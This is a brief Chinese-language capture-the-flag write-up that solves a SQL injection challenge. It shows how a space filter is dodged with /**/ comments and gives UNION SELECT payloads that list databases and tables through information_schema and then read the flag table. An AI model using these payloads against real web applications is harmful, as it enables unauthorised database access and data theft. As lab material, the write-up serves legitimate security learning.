尝试
1
1’
1”
发现1’还是会报错,所以注入口还是1’
再试试1' and '1'='1发现报出SQLi detected!
取消空格试试1'and'1'='1
似乎可以进入,应该就是过滤了空格
我们仍使用/**/的方法
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
查询数据库表信息
查询数据表web1下的列信息
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1
然后查询flag
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
